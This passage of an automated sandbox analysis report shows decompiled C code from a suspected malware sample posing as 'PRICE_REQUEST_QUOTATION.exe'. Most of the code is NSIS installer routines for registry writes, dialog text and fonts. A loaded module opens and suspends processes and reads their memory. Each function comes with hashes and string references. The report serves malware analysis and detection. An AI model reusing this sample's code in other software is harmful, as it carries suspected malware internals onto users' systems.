                                        				}
                                        			}



























                                        Strings
                                        • Was unable to locate module., xrefs: 73334242
                                        • %p, %u, %s, %s, %p, %u, %p., xrefs: 733341DE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.275216478.0000000073331000.00000020.00020000.sdmp, Offset: 73330000, based on PE: true
                                        • Associated: 00000000.00000002.275206383.0000000073330000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.275237107.0000000073339000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.275260371.000000007333A000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.275275573.000000007333C000.00000080.00020000.sdmp
                                        • Associated: 00000000.00000002.275311441.000000007333E000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID: %p, %u, %s, %s, %p, %u, %p.$Was unable to locate module.
                                        • API String ID: 0-1385147342
                                        • Opcode ID: 10f90b4c0eb131226d4c7097058fb3e8f8d266d607340fd6f70c2cafce75b6c0
                                        • Instruction ID: af0ee64afa0b4058e2e4fce81d84a192a5a10648845077a4a53635171796a17b
                                        • Opcode Fuzzy Hash: 10f90b4c0eb131226d4c7097058fb3e8f8d266d607340fd6f70c2cafce75b6c0
                                        • Instruction Fuzzy Hash: 0B514CB5D00219EBEB14CF94DD40BDE73B9AF49314F94C218E91AA7240D338EA51CBA2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 17%
                                        			E73336A70(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                        				long* _v8;
                                        				signed int _v12;
                                        				int _v16;
                                        				int _v20;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				long* _t49;
                                        
                                        				_v28 = E733314A0(_a4);
                                        				0x73330000("%p, %#x, %u.\n", _a4, _a8, _a12);
                                        				_push(_v28);
                                        				_v8 = E73331120(_a4);
                                        				if(_v8 != 0) {
                                        					if((_v8[1] & 0x00000001) == 0) {
                                        						0x73330000("Unsupported attach flags %#x.\n", _v8[1]);
                                        						return 0x80004001;
                                        					}
                                        					if((_v8[1] & 0x00000004) != 0) {
                                        						_v16 = 0;
                                        					} else {
                                        						_v16 = 1;
                                        					}
                                        					_v20 = _v16;
                                        					_v12 = 0x1030;
                                        					if(_v20 != 0) {
                                        						_v12 = _v12 | 0x00000800;
                                        					}
                                        					_v8[2] = OpenProcess(_v12, 0,  *_v8);
                                        					if(_v8[2] != 0) {
                                        						if(_v20 != 0) {
                                        							_t49 = _v8;
                                        							0x73330000( *((intOrPtr*)(_t49 + 8)));
                                        							_v24 = _t49;
                                        							if(_v24 != 0) {
                                        								0x73330000("Failed to suspend a process, status %#x.\n", _v24);
                                        							}
                                        						}
                                        						return 0;
                                        					} else {
                                        						0x73330000("Failed to get process handle for pid %#x.\n",  *_v8);
                                        						return 0x8000ffff;
                                        					}
                                        				}
                                        				return 0x8000ffff;
                                        			}











                                        APIs
                                        • OpenProcess.KERNEL32(00001030,00000000,00000000), ref: 73336B12
                                        Strings
                                        • Failed to get process handle for pid %#x., xrefs: 73336B2D
                                        • %p, %#x, %u., xrefs: 73336A91
                                        • Unsupported attach flags %#x., xrefs: 73336B7D
                                        • Failed to suspend a process, status %#x., xrefs: 73336B63
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.275216478.0000000073331000.00000020.00020000.sdmp, Offset: 73330000, based on PE: true
                                        • Associated: 00000000.00000002.275206383.0000000073330000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.275237107.0000000073339000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.275260371.000000007333A000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.275275573.000000007333C000.00000080.00020000.sdmp
                                        • Associated: 00000000.00000002.275311441.000000007333E000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: OpenProcess
                                        • String ID: %p, %#x, %u.$Failed to get process handle for pid %#x.$Failed to suspend a process, status %#x.$Unsupported attach flags %#x.
                                        • API String ID: 3743895883-1030270061
                                        • Opcode ID: 6b7e44c5cde5d0342a32cdd8c9df0291d5192a0d3433722442b7f424b0556212
                                        • Instruction ID: 93220b627eb32708499ad54443a3abfd4d5e1b93b6d3d8a1d4b5b6c7a2173f50
                                        • Opcode Fuzzy Hash: 6b7e44c5cde5d0342a32cdd8c9df0291d5192a0d3433722442b7f424b0556212
                                        • Instruction Fuzzy Hash: B1315EB5E00108EFDB10DF94C981BAEB7B9AB46304F55C158E8066B341D739DE41CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 85%
                                        			E00402336(void* __eax) {
                                        				void* _t15;
                                        				char* _t18;
                                        				int _t19;
                                        				char _t24;
                                        				int _t27;
                                        				signed int _t30;
                                        				intOrPtr _t35;
                                        				void* _t37;
                                        
                                        				_t15 = E00402B1E(__eax);
                                        				_t35 =  *((intOrPtr*)(_t37 - 0x18));
                                        				 *(_t37 - 0x34) =  *(_t37 - 0x14);
                                        				 *(_t37 - 0x38) = E00402A29(2);
                                        				_t18 = E00402A29(0x11);
                                        				_t30 =  *0x42ecd0; // 0x0
                                        				 *(_t37 - 4) = 1;
                                        				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
                                        				if(_t19 == 0) {
                                        					if(_t35 == 1) {
                                        						E00402A29(0x23);
                                        						_t19 = lstrlenA(0x40a440) + 1;
                                        					}
                                        					if(_t35 == 4) {
                                        						_t24 = E00402A0C(3);
                                        						 *0x40a440 = _t24;
                                        						_t19 = _t35;
                                        					}
                                        					if(_t35 == 3) {
                                        						_t19 = E00402E8E( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a440, 0xc00);
                                        					}
                                        					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a440, _t19) == 0) {
                                        						 *(_t37 - 4) = _t27;
                                        					}
                                        					_push( *(_t37 + 8));
                                        					RegCloseKey();
                                        				}
                                        				 *0x42eca8 =  *0x42eca8 +  *(_t37 - 4);
                                        				return 0;
                                        			}












                                        APIs
                                        • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402374
                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402394
                                        • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023CD
                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024B0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: CloseCreateValuelstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp
                                        • API String ID: 1356686001-340383955
                                        • Opcode ID: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
                                        • Instruction ID: 7eaf0ec052d83a67d7bbddc98f61bbb11a40701f4c7c8ad3ea5d843478098636
                                        • Opcode Fuzzy Hash: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
                                        • Instruction Fuzzy Hash: 2211A271E00108BFEB10EFA5DE89EAF7678EB40758F20403AF505B31D0D6B85D019A69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 45%
                                        			E73332D80(void* __eflags, intOrPtr _a4, void* _a8, intOrPtr _a12, void* _a16, long _a20, intOrPtr* _a24) {
                                        				intOrPtr _v8;
                                        				intOrPtr _v12;
                                        				long _v16;
                                        				void* _t24;
                                        				intOrPtr _t28;
                                        
                                        				_v12 = E73331480(_a4);
                                        				_v8 = 0;
                                        				_t24 = _a16;
                                        				0x73330000(_a8, _a12, _t24, _a20, _a24);
                                        				0x73330000("%p, %s, %p, %u, %p.\n", _a4, _t24);
                                        				_push(_v12);
                                        				 *0x73338000 = E73331120(_a4);
                                        				if( *0x73338000 != 0) {
                                        					_t28 =  *0x73338000;
                                        					_t39 =  *(_t28 + 8);
                                        					if(ReadProcessMemory( *(_t28 + 8), _a8, _a16, _a20,  &_v16) == 0) {
                                        						_v8 = E73337730(_t39, GetLastError());
                                        						0x73330000("Failed to read process memory %#x.\n", _v8);
                                        					} else {
                                        						if(_a24 != 0) {
                                        							 *_a24 = _v16;
                                        						}
                                        					}
                                        					return _v8;
                                        				}
                                        				return 0x8000ffff;
                                        			}









                                        APIs
                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 73332E04
                                        Strings
                                        • Failed to read process memory %#x., xrefs: 73332E34
                                        • %p, %s, %p, %u, %p., xrefs: 73332DBD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.275216478.0000000073331000.00000020.00020000.sdmp, Offset: 73330000, based on PE: true
                                        • Associated: 00000000.00000002.275206383.0000000073330000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.275237107.0000000073339000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.275260371.000000007333A000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.275275573.000000007333C000.00000080.00020000.sdmp
                                        • Associated: 00000000.00000002.275311441.000000007333E000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID: %p, %s, %p, %u, %p.$Failed to read process memory %#x.
                                        • API String ID: 1726664587-1385917401
                                        • Opcode ID: 74bf3cf28aa9f64e696521cf3d3203ba87b44359e452857aad357da8aeaf5617
                                        • Instruction ID: 25455e33d7dbacaba236bb83651c16a53f1cb7fbeac588cbcb0455c6a5c082f4
                                        • Opcode Fuzzy Hash: 74bf3cf28aa9f64e696521cf3d3203ba87b44359e452857aad357da8aeaf5617
                                        • Instruction Fuzzy Hash: 8F213EF6E00209AFDB20DF94D945FDE77B9AB49201F50C128F909DB250E738EA55CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                        			E00402A69(void* _a4, char* _a8, long _a12) {
                                        				void* _v8;
                                        				char _v272;
                                        				signed char _t16;
                                        				long _t18;
                                        				long _t25;
                                        				intOrPtr* _t27;
                                        				long _t28;
                                        
                                        				_t16 =  *0x42ecd0; // 0x0
                                        				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
                                        				if(_t18 == 0) {
                                        					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                        						__eflags = _a12;
                                        						if(_a12 != 0) {
                                        							RegCloseKey(_v8);
                                        							L8:
                                        							__eflags = 1;
                                        							return 1;
                                        						}
                                        						_t25 = E00402A69(_v8,  &_v272, 0);
                                        						__eflags = _t25;
                                        						if(_t25 != 0) {
                                        							break;
                                        						}
                                        					}
                                        					RegCloseKey(_v8);
                                        					_t27 = E00405F57(4);
                                        					if(_t27 == 0) {
                                        						__eflags =  *0x42ecd0; // 0x0
                                        						if(__eflags != 0) {
                                        							goto L8;
                                        						}
                                        						_t28 = RegDeleteKeyA(_a4, _a8);
                                        						__eflags = _t28;
                                        						if(_t28 != 0) {
                                        							goto L8;
                                        						}
                                        						return _t28;
                                        					}
                                        					return  *_t27(_a4, _a8,  *0x42ecd0, 0);
                                        				}
                                        				return _t18;
                                        			}











                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A8A
                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                                        • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                                        • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: Close$DeleteEnumOpen
                                        • String ID:
                                        • API String ID: 1912718029-0
                                        • Opcode ID: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
                                        • Instruction ID: 1feb4b7649154eaa2fe5ae549c730efe0d3e9f21b7ed1b50a1ad382232646690
                                        • Opcode Fuzzy Hash: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
                                        • Instruction Fuzzy Hash: DF116A71600009FEDF21AF91DE89DAA3B79FB04354F104076FA05E00A0DBB99E51BF69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00401CDE(int __edx) {
                                        				void* _t17;
                                        				struct HINSTANCE__* _t21;
                                        				struct HWND__* _t25;
                                        				void* _t27;
                                        
                                        				_t25 = GetDlgItem( *(_t27 - 8), __edx);
                                        				GetClientRect(_t25, _t27 - 0x50);
                                        				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A29(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
                                        				if(_t17 != _t21) {
                                        					DeleteObject(_t17);
                                        				}
                                        				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t27 - 4));
                                        				return 0;
                                        			}








                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                        • String ID:
                                        • API String ID: 1849352358-0
                                        • Opcode ID: 7c24492a2b1aaffc464dc9fd8bbcb84ba4fc277a470a63d707f881b65c2f59f1
                                        • Instruction ID: 7835fe8bf079333df41a7cdc3f5accb8fa20f3c3d3d5b8549a113c77ab23cea9
                                        • Opcode Fuzzy Hash: 7c24492a2b1aaffc464dc9fd8bbcb84ba4fc277a470a63d707f881b65c2f59f1
                                        • Instruction Fuzzy Hash: BDF0EC72A04118AFE701EBE4DE88DAFB77CEB44305B14443AF501F6190C7749D019B79
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 77%
                                        			E00404678(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                        				char _v36;
                                        				char _v68;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t21;
                                        				signed int _t22;
                                        				void* _t29;
                                        				void* _t31;
                                        				void* _t32;
                                        				void* _t41;
                                        				signed int _t43;
                                        				signed int _t47;
                                        				signed int _t50;
                                        				signed int _t51;
                                        				signed int _t53;
                                        
                                        				_t21 = _a16;
                                        				_t51 = _a12;
                                        				_t41 = 0xffffffdc;
                                        				if(_t21 == 0) {
                                        					_push(0x14);
                                        					_pop(0);
                                        					_t22 = _t51;
                                        					if(_t51 < 0x100000) {
                                        						_push(0xa);
                                        						_pop(0);
                                        						_t41 = 0xffffffdd;
                                        					}
                                        					if(_t51 < 0x400) {
                                        						_t41 = 0xffffffde;
                                        					}
                                        					if(_t51 < 0xffff3333) {
                                        						_t50 = 0x14;
                                        						asm("cdq");
                                        						_t22 = 1 / _t50 + _t51;
                                        					}
                                        					_t23 = _t22 & 0x00ffffff;
                                        					_t53 = _t22 >> 0;
                                        					_t43 = 0xa;
                                        					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                                        				} else {
                                        					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                                        					_t47 = 0;
                                        				}
                                        				_t29 = E00405BE9(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                                        				_t31 = E00405BE9(_t41, _t47, _t53,  &_v68, _t41);
                                        				_t32 = E00405BE9(_t41, _t47, 0x42a0a0, 0x42a0a0, _a8);
                                        				wsprintfA(_t32 + lstrlenA(0x42a0a0), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                                        				return SetDlgItemTextA( *0x42e3f8, _a4, 0x42a0a0);
                                        			}




















                                        APIs
                                        • lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
                                        • wsprintfA.USER32 ref: 0040471E
                                        • SetDlgItemTextA.USER32 ref: 00404731
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: ItemTextlstrlenwsprintf
                                        • String ID: %u.%u%s%s
                                        • API String ID: 3540041739-3551169577
                                        • Opcode ID: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
                                        • Instruction ID: 062a34f2e1a42b9bac053d54189fda3392bb7b96bf994c182a5c545f77b0e815
                                        • Opcode Fuzzy Hash: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
                                        • Instruction Fuzzy Hash: CD110673A041282BEB00656D9C41EAF32D8DB86334F290637FA25F71D1E979EC1246E9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 51%
                                        			E00401BCA() {
                                        				signed int _t28;
                                        				CHAR* _t31;
                                        				long _t32;
                                        				int _t37;
                                        				signed int _t38;
                                        				int _t42;
                                        				int _t48;
                                        				struct HWND__* _t52;
                                        				void* _t55;
                                        
                                        				 *(_t55 - 8) = E00402A0C(3);
                                        				 *(_t55 + 8) = E00402A0C(4);
                                        				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
                                        					 *((intOrPtr*)(__ebp - 8)) = E00402A29(0x33);
                                        				}
                                        				__eflags =  *(_t55 - 0x14) & 0x00000002;
                                        				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
                                        					 *(_t55 + 8) = E00402A29(0x44);
                                        				}
                                        				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
                                        				_push(1);
                                        				if(__eflags != 0) {
                                        					_t50 = E00402A29();
                                        					_t28 = E00402A29();
                                        					asm("sbb ecx, ecx");
                                        					asm("sbb eax, eax");
                                        					_t31 =  ~( *_t27) & _t50;
                                        					__eflags = _t31;
                                        					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
                                        					goto L10;
                                        				} else {
                                        					_t52 = E00402A0C();
                                        					_t37 = E00402A0C();
                                        					_t48 =  *(_t55 - 0x14) >> 2;
                                        					if(__eflags == 0) {
                                        						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
                                        						L10:
                                        						 *(_t55 - 0xc) = _t32;
                                        					} else {
                                        						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
                                        						asm("sbb eax, eax");
                                        						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                                        					}
                                        				}
                                        				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
                                        				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
                                        					_push( *(_t55 - 0xc));
                                        					E00405B25();
                                        				}
                                        				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t55 - 4));
                                        				return 0;
                                        			}













                                        APIs
                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                        • SendMessageA.USER32 ref: 00401C42
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: MessageSend$Timeout
                                        • String ID: !
                                        • API String ID: 1777923405-2657877971
                                        • Opcode ID: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
                                        • Instruction ID: 4d3ef85e63b9541cbe972d5e7c3a425ff70263948fb1d71cee34ed50e591440d
                                        • Opcode Fuzzy Hash: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
                                        • Instruction Fuzzy Hash: B821A171A44149BEEF02AFF5C94AAEE7B75DF44704F10407EF501BA1D1DAB88A40DB29
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004038E3(void* __ecx, void* __eflags) {
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed short _t6;
                                        				intOrPtr _t11;
                                        				signed int _t13;
                                        				intOrPtr _t15;
                                        				signed int _t16;
                                        				signed short* _t18;
                                        				signed int _t20;
                                        				signed short* _t23;
                                        				intOrPtr _t25;
                                        				signed int _t26;
                                        				intOrPtr* _t27;
                                        
                                        				_t24 = "1033";
                                        				_t13 = 0xffff;
                                        				_t6 = E00405B3E(__ecx, "1033");
                                        				while(1) {
                                        					_t26 =  *0x42ec64; // 0x1
                                        					if(_t26 == 0) {
                                        						goto L7;
                                        					}
                                        					_t15 =  *0x42ec30; // 0x6c0230
                                        					_t16 =  *(_t15 + 0x64);
                                        					_t20 =  ~_t16;
                                        					_t18 = _t16 * _t26 +  *0x42ec60;
                                        					while(1) {
                                        						_t18 = _t18 + _t20;
                                        						_t26 = _t26 - 1;
                                        						if((( *_t18 ^ _t6) & _t13) == 0) {
                                        							break;
                                        						}
                                        						if(_t26 != 0) {
                                        							continue;
                                        						}
                                        						goto L7;
                                        					}
                                        					 *0x42e400 = _t18[1];
                                        					 *0x42ecc8 = _t18[3];
                                        					_t23 =  &(_t18[5]);
                                        					if(_t23 != 0) {
                                        						 *0x42e3fc = _t23;
                                        						E00405B25(_t24,  *_t18 & 0x0000ffff);
                                        						SetWindowTextA( *0x42a078, E00405BE9(_t13, _t24, _t26, "jwfmxhqapdbzygp Setup", 0xfffffffe));
                                        						_t11 =  *0x42ec4c; // 0x4
                                        						_t27 =  *0x42ec48; // 0x6c03dc
                                        						if(_t11 == 0) {
                                        							L15:
                                        							return _t11;
                                        						}
                                        						_t25 = _t11;
                                        						do {
                                        							_t11 =  *_t27;
                                        							if(_t11 != 0) {
                                        								_t5 = _t27 + 0x18; // 0x6c03f4
                                        								_t11 = E00405BE9(_t13, _t25, _t27, _t5, _t11);
                                        							}
                                        							_t27 = _t27 + 0x418;
                                        							_t25 = _t25 - 1;
                                        						} while (_t25 != 0);
                                        						goto L15;
                                        					}
                                        					L7:
                                        					if(_t13 != 0xffff) {
                                        						_t13 = 0;
                                        					} else {
                                        						_t13 = 0x3ff;
                                        					}
                                        				}
                                        			}


















                                        APIs
                                        • SetWindowTextA.USER32(00000000,jwfmxhqapdbzygp Setup), ref: 0040397B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: TextWindow
                                        • String ID: "C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" $1033$jwfmxhqapdbzygp Setup
                                        • API String ID: 530164218-1167926908
                                        • Opcode ID: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
                                        • Instruction ID: 62fcd584ab61880d0a0793d1f8a393d96878735a1f32199b1fca161b6814d522
                                        • Opcode Fuzzy Hash: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
                                        • Instruction Fuzzy Hash: 7F1105B1B046119BC7349F57DC809737BACEB85715368813FE8016B3A0DA79AD03CB98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004056BA(CHAR* _a4) {
                                        				CHAR* _t7;
                                        
                                        				_t7 = _a4;
                                        				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                        					lstrcatA(_t7, 0x409010);
                                        				}
                                        				return _t7;
                                        			}





                                        APIs
                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403117,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004056C0
                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403117,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004056C9
                                        • lstrcatA.KERNEL32(?,00409010), ref: 004056DA
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004056BA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: CharPrevlstrcatlstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 2659869361-823278215
                                        • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                        • Instruction ID: 80516fad0c4d4920465a9bb29442f27547f360336c83292ed6deef4f7ecf272a
                                        • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                        • Instruction Fuzzy Hash: 88D0A962A09A302AE20223198C05F9B7AA8CF02351B080862F140B6292C27C3C818BFE
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 67%
                                        			E00401D38() {
                                        				void* __esi;
                                        				int _t6;
                                        				signed char _t11;
                                        				struct HFONT__* _t14;
                                        				void* _t18;
                                        				void* _t24;
                                        				void* _t26;
                                        				void* _t28;
                                        
                                        				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
                                        				0x40b044->lfHeight =  ~(MulDiv(E00402A0C(2), _t6, 0x48));
                                        				 *0x40b054 = E00402A0C(3);
                                        				_t11 =  *((intOrPtr*)(_t28 - 0x18));
                                        				 *0x40b05b = 1;
                                        				 *0x40b058 = _t11 & 0x00000001;
                                        				 *0x40b059 = _t11 & 0x00000002;
                                        				 *0x40b05a = _t11 & 0x00000004;
                                        				E00405BE9(_t18, _t24, _t26, 0x40b060,  *((intOrPtr*)(_t28 - 0x24)));
                                        				_t14 = CreateFontIndirectA(0x40b044);
                                        				_push(_t14);
                                        				_push(_t26);
